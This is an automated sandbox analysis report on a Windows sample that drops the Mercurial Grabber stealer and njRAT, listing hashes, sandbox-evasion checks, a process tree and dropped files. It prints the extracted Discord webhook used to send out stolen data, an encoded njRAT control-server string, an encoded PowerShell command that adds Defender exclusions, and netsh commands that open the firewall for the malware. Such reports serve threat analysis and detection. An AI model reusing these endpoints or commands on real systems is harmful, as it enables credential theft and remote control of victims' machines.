Analysis
-
max time kernel
150s -
max time network
182s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03-10-2022 23:20
Static task
static1
Behavioral task
behavioral1
Sample
4e6984054c17293752f8d11ccac45e70.exe
Resource
win7-20220812-en
General
-
Target
4e6984054c17293752f8d11ccac45e70.exe
-
Size
159KB
-
MD5
4e6984054c17293752f8d11ccac45e70
-
SHA1
96b45cc928488f23eb485ebd72f1276996c7f785
-
SHA256
8d38d3866a011792617c9784fc9dc556f0c8c6aeeeb96aef679aea6ff6831028
-
SHA512
978e885d724fd91553483a077979f940a9349e45fce08b4a39c5cac25a5a75e0dd27b166b4724be19a435beef780ad8f866787035944285222385623af1ce9a5
-
SSDEEP
3072:C6x5F6chV9MBOefbGEKr2fewpgsRMCo1pn2A3PM+:CK6u9p3EKbwhRMCkp
Malware Config
Extracted
mercurialgrabber
https://discord.com/api/webhooks/1020039781461270569/vy0h8kS-gC86OffrPKkierhCOJQYdMCGfu4Dr7HRyL4VcCHEP6llcvNaOkPDg-SgwAnl
Extracted
njrat
0.7d
HacKed
Ni50Y3AuZXUubmdyb2suaW8Strik:MTM5OTI=
dcc8f8f212bdcee4931d8d1d2c481753
-
reg_key
dcc8f8f212bdcee4931d8d1d2c481753
-
splitter
|'|'|
Signatures
-
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions output.exe -
Executes dropped EXE 2 IoCs
Processes:
output.exeWindows Defender.exepid process 1568 output.exe 884 Windows Defender.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools output.exe -
Modifies Windows Firewall 1 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 824 netsh.exe 1752 netsh.exe 1464 netsh.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion output.exe -
Drops startup file 2 IoCs
Processes:
Windows Defender.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Windows Defender.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Windows Defender.exe -
Loads dropped DLL 3 IoCs
Processes:
4e6984054c17293752f8d11ccac45e70.exepid process 1004 4e6984054c17293752f8d11ccac45e70.exe 1004 4e6984054c17293752f8d11ccac45e70.exe 1004 4e6984054c17293752f8d11ccac45e70.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip4.seeip.org 15 ip4.seeip.org 16 ip-api.com 6 ip4.seeip.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum output.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 output.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1516 1568 WerFault.exe output.exe -
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S output.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString output.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 432 timeout.exe 336 timeout.exe 1076 timeout.exe 1668 timeout.exe 1820 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
output.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 output.exe -
Processes:
output.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 output.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 output.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 output.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 output.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 output.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 output.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1632 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Windows Defender.exepid process 884 Windows Defender.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
powershell.exeoutput.exeWindows Defender.exedescription pid process Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 1568 output.exe Token: SeDebugPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe Token: 33 884 Windows Defender.exe Token: SeIncBasePriorityPrivilege 884 Windows Defender.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
4e6984054c17293752f8d11ccac45e70.execmd.exeWindows Defender.exeoutput.exedescription pid process target process PID 1004 wrote to memory of 1632 1004 4e6984054c17293752f8d11ccac45e70.exe powershell.exe PID 1004 wrote to memory of 1632 1004 4e6984054c17293752f8d11ccac45e70.exe powershell.exe PID 1004 wrote to memory of 1632 1004 4e6984054c17293752f8d11ccac45e70.exe powershell.exe PID 1004 wrote to memory of 1632 1004 4e6984054c17293752f8d11ccac45e70.exe powershell.exe PID 1004 wrote to memory of 1568 1004 4e6984054c17293752f8d11ccac45e70.exe output.exe PID 1004 wrote to memory of 1568 1004 4e6984054c17293752f8d11ccac45e70.exe output.exe PID 1004 wrote to memory of 1568 1004 4e6984054c17293752f8d11ccac45e70.exe output.exe PID 1004 wrote to memory of 1568 1004 4e6984054c17293752f8d11ccac45e70.exe output.exe PID 1004 wrote to memory of 884 1004 4e6984054c17293752f8d11ccac45e70.exe Windows Defender.exe PID 1004 wrote to memory of 884 1004 4e6984054c17293752f8d11ccac45e70.exe Windows Defender.exe PID 1004 wrote to memory of 884 1004 4e6984054c17293752f8d11ccac45e70.exe Windows Defender.exe PID 1004 wrote to memory of 884 1004 4e6984054c17293752f8d11ccac45e70.exe Windows Defender.exe PID 1004 wrote to memory of 920 1004 4e6984054c17293752f8d11ccac45e70.exe cmd.exe PID 1004 wrote to memory of 920 1004 4e6984054c17293752f8d11ccac45e70.exe cmd.exe PID 1004 wrote to memory of 920 1004 4e6984054c17293752f8d11ccac45e70.exe cmd.exe PID 1004 wrote to memory of 920 1004 4e6984054c17293752f8d11ccac45e70.exe cmd.exe PID 920 wrote to memory of 684 920 cmd.exe chcp.com PID 920 wrote to memory of 684 920 cmd.exe chcp.com PID 920 wrote to memory of 684 920 cmd.exe chcp.com PID 920 wrote to memory of 684 920 cmd.exe chcp.com PID 920 wrote to memory of 1540 920 cmd.exe mode.com PID 920 wrote to memory of 1540 920 cmd.exe mode.com PID 920 wrote to memory of 1540 920 cmd.exe mode.com PID 920 wrote to memory of 1540 920 cmd.exe mode.com PID 920 wrote to memory of 432 920 cmd.exe timeout.exe PID 920 wrote to memory of 432 920 cmd.exe timeout.exe PID 920 wrote to memory of 432 920 cmd.exe timeout.exe PID 920 wrote to memory of 432 920 cmd.exe timeout.exe PID 920 wrote to memory of 336 920 cmd.exe timeout.exe PID 920 wrote to memory of 336 920 cmd.exe timeout.exe PID 920 wrote to memory of 336 920 cmd.exe timeout.exe PID 920 wrote to memory of 336 920 cmd.exe timeout.exe PID 884 wrote to memory of 824 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 824 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 824 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 824 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 1752 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 1752 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 1752 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 1752 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 1464 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 1464 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 1464 884 Windows Defender.exe netsh.exe PID 884 wrote to memory of 1464 884 Windows Defender.exe netsh.exe PID 920 wrote to memory of 1076 920 cmd.exe timeout.exe PID 920 wrote to memory of 1076 920 cmd.exe timeout.exe PID 920 wrote to memory of 1076 920 cmd.exe timeout.exe PID 920 wrote to memory of 1076 920 cmd.exe timeout.exe PID 920 wrote to memory of 1668 920 cmd.exe timeout.exe PID 920 wrote to memory of 1668 920 cmd.exe timeout.exe PID 920 wrote to memory of 1668 920 cmd.exe timeout.exe PID 920 wrote to memory of 1668 920 cmd.exe timeout.exe PID 920 wrote to memory of 1820 920 cmd.exe timeout.exe PID 920 wrote to memory of 1820 920 cmd.exe timeout.exe PID 920 wrote to memory of 1820 920 cmd.exe timeout.exe PID 920 wrote to memory of 1820 920 cmd.exe timeout.exe PID 920 wrote to memory of 1748 920 cmd.exe mode.com PID 920 wrote to memory of 1748 920 cmd.exe mode.com PID 920 wrote to memory of 1748 920 cmd.exe mode.com PID 920 wrote to memory of 1748 920 cmd.exe mode.com PID 1568 wrote to memory of 1516 1568 output.exe WerFault.exe PID 1568 wrote to memory of 1516 1568 output.exe WerFault.exe PID 1568 wrote to memory of 1516 1568 output.exe WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\output.exe"C:\Users\Admin\AppData\Local\Temp\output.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1568 -s 18563⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
-
C:\Windows\SysWOW64\mode.commode 80,153⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mode.commode 130,303⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exeFilesize
93KB
MD50c6c4a3d96c78a24d6568b83e141896e
SHA1f5fb76840cb984722f61b370fb6641fa4ad9ac7e
SHA25673870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7
SHA5121700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be
-
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exeFilesize
93KB
MD50c6c4a3d96c78a24d6568b83e141896e
SHA1f5fb76840cb984722f61b370fb6641fa4ad9ac7e
SHA25673870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7
SHA5121700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be
-
C:\Users\Admin\AppData\Local\Temp\output.exeFilesize
41KB
MD55f34fc15a6555433e91d8dc0564d2092
SHA1dc786e4ddf9af8de8909da2489d2848dd39f762a
SHA256c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c
SHA512fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238
-
C:\Users\Admin\AppData\Local\Temp\output.exeFilesize
41KB
MD55f34fc15a6555433e91d8dc0564d2092
SHA1dc786e4ddf9af8de8909da2489d2848dd39f762a
SHA256c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c
SHA512fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238
-
C:\Users\Admin\AppData\Local\Temp\scam_woofer.batFilesize
19KB
MD54b4e566a986fe97ba2d89f9c64a24c64
SHA118bba3d5058b4b53fc99f9fba94110f4e8f8c2ea
SHA2562950d0e125c3d1d11be27388ca83ef5d3fbcd71e49c0ed4eb0e0373340707a97
SHA51232e39cbd0ba54cd1bcf25158774a44060d65bdeef9de0986be5267c3da229d8e743afaa67b98492172b7b59cd3fb0cf9e0c5dc149651a3518479ac8af677cee8
-
\Users\Admin\AppData\Local\Temp\Windows Defender.exeFilesize
93KB
MD50c6c4a3d96c78a24d6568b83e141896e
SHA1f5fb76840cb984722f61b370fb6641fa4ad9ac7e
SHA25673870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7
SHA5121700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be
-
\Users\Admin\AppData\Local\Temp\Windows Defender.exeFilesize
93KB
MD50c6c4a3d96c78a24d6568b83e141896e
SHA1f5fb76840cb984722f61b370fb6641fa4ad9ac7e
SHA25673870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7
SHA5121700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be
-
\Users\Admin\AppData\Local\Temp\output.exeFilesize
41KB
MD55f34fc15a6555433e91d8dc0564d2092
SHA1dc786e4ddf9af8de8909da2489d2848dd39f762a
SHA256c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c
